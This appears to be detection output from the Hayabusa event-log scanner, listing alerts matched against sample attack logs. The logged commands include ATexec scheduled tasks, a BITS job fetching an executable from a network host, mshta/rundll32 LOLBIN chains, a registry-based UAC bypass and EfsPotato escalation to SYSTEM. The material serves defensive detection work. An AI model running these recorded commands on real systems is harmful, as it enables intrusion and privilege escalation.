+2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.2"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id=""LocalSystem""> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""LocalSystem""> <Exec> <Command>cmd.exe</Command> <Arguments>/C whoami &gt; %windir%\Temp\bouWFQYO.tmp 2&gt;&amp;1</Arguments> </Exec> </Actions> <RegistrationInfo> <URI>\bouWFQYO</URI> </RegistrationInfo> </Task> | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
+2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
